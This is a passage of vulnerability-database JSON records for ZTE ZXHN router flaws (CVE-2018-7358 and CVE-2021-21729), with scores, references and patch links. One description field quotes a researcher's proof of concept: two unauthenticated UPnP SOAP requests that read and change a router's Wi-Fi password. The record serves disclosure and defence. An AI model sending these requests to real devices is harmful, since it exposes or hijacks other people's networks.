            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk1.2t6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "105963"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:zte:zxhn_h168n_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Usman Saeed",
        "sources": [
          {
            "db": "BID",
            "id": "105963"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2018-7358",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "CVE-2018-7358",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "VHN-137390",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7358",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "psirt@zte.com.cn",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7358",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7358",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "psirt@zte.com.cn",
                "id": "CVE-2018-7358",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7358",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201811-445",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137390",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. \nZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China\u0027s ZTE Corporation ( ZTE ) company\u2019s a wireless VDSL router.  ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)\n\n\n\n\nDisclaimer: [This POC is for Educational Purposes , I would Not be\n\n\nresponsible for any misuse of the information mentioned in this blog post]\n\n\n\n\n[+] Unauthenticated\n\n\n\n\n[+] Author: Usman Saeed (usman [at] xc0re.net)\n\n\n\n\n[+] Protocol: UPnP\n\n\n\n\n[+] Affected Harware/Software:\n\n\n\n\nModel name: ZXHN H168N v2.2\n\n\n\n\nBuild Timestamp: 20171127193202\n\n\n\n\nSoftware Version: V2.2.0_PK1.2T5\n\n\n\n\n[+] Findings:\n\n\n\n\n1. Unauthenticated access to WLAN password:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 288\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003c/u:GetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n2. Unauthenticated WLAN passphrase change:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 496\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003cNewWEPKey0\u003e{omitted}\u003c/NewWEPKey0\u003e\u003cNewWEPKey1\u003e{omitted}\u003c/NewWEPKey1\u003e\u003cNewWEPKey2\u003e{omitted}\u003c/NewWEPKey2\u003e\u003cNewWEPKey3\u003e{omitted}\u003c/NewWEPKey3\u003e\u003cNewPreSharedKey\u003e{omitted}\u003c/NewPreSharedKey\u003e\u003cNewKeyPassphrase\u003e{omitted}\u003c/NewKeyPassphrase\u003e\u003c/u:SetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n[*] Solution:\n\n\n\n\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. \n\n\n\n\n[*] Note:\n\n\n\n\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. \n\n\n\n\n[+] Responsible Disclosure:\n\n\n\n\nVulnerabilities identified - 20 August, 2018\n\n\n\n\nReported to ZTE - 28 August, 2018\n\n\n\n\nZTE official statement - 17 September 2018\n\n\n\n\nZTE patched the vulnerability - 12 November 2018\n\n\n\n\nThe operator pushed the update - 12 November 2018\n\n\n\n\nCVE published - CVE- 2018-7357 and CVE-2018-7358\n\n\n\n\nPublic disclosure - 12 November 2018\n\n\n\n\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n\n\n\n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "BID",
            "id": "105963"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          }
        ],
        "trust": 2.07
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7358",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "105963",
            "trust": 2.0
          },
          {
            "db": "ZTE",
            "id": "1009523",
            "trust": 2.0
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45972",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-137390",
            "trust": 0.1
          },
          {
            "db": "ZTE",
            "id": "1009522",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "150728",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "db": "BID",
            "id": "105963"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "id": "VAR-201811-0984",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          }
        ],
        "trust": 0.47662336000000005
      },
      "last_update_date": "2024-11-23T22:30:10.941000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product",
            "trust": 0.8,
            "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
          },
          {
            "title": "ZTE ZXHN H168N Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86848"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.0,
            "url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/105963"
          },
          {
            "trust": 1.7,
            "url": "https://www.exploit-db.com/exploits/45972/"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7358"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7358"
          },
          {
            "trust": 0.3,
            "url": "http://www.zte.com.cn/"
          },
          {
            "trust": 0.1,
            "url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522"
          },
          {
            "trust": 0.1,
            "url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:getsecuritykeys"
          },
          {
            "trust": 0.1,
            "url": "http://schemas.xmlsoap.org/soap/envelope/\""
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7357"
          },
          {
            "trust": 0.1,
            "url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:setsecuritykeys"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "db": "BID",
            "id": "105963"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "db": "BID",
            "id": "105963"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-11-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "date": "2018-11-15T00:00:00",
            "db": "BID",
            "id": "105963"
          },
          {
            "date": "2019-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "date": "2018-12-11T01:49:45",
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "date": "2018-11-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "date": "2018-11-14T15:29:02.220000",
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137390"
          },
          {
            "date": "2018-11-15T00:00:00",
            "db": "BID",
            "id": "105963"
          },
          {
            "date": "2019-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          },
          {
            "date": "2024-11-21T04:12:03.917000",
            "db": "NVD",
            "id": "CVE-2018-7358"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE ZXHN H168N Authentication vulnerabilities in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012683"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-445"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0777

    Vulnerability from variot - Updated: 2024-11-23 22:29

    Some ZTE products have CSRF vulnerability. Because some pages lack CSRF random value verification, attackers could perform illegal authorization operations by constructing messages.This affects: ZXHN H168N V3.5.0_EG1T5_TE, V2.5.5, ZXHN H108N V2.5.5_BTMT1

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0777",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h108n",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zte",
            "version": "2.5.5_btmt1"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zte",
            "version": "3.5.0_eg1t5_te"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "cve": "CVE-2021-21729",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2021-21729",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-21729",
                "impactScore": 3.6,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-21729",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-941",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-21729",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21729"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Some ZTE products have CSRF vulnerability. Because some pages lack CSRF random value verification, attackers could perform illegal authorization operations by constructing messages.This affects: ZXHN H168N V3.5.0_EG1T5_TE, V2.5.5, ZXHN H108N V2.5.5_BTMT1",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-21729"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "ZTE",
            "id": "1014904",
            "trust": 1.7
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21729",
            "trust": 1.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-21729",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21729"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "id": "VAR-202104-0777",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.32164502
      },
      "last_update_date": "2024-11-23T22:29:16.533000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-330",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1014904"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21729"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/352.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21729"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-21729"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-21729"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          },
          {
            "date": "2021-04-13T16:15:12.373000",
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-21T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-21729"
          },
          {
            "date": "2022-06-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          },
          {
            "date": "2024-11-21T05:48:53.660000",
            "db": "NVD",
            "id": "CVE-2021-21729"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE Cross-site request forgery vulnerabilities in multiple products",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-941"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0778

    Vulnerability from variot - Updated: 2024-11-23 22:11

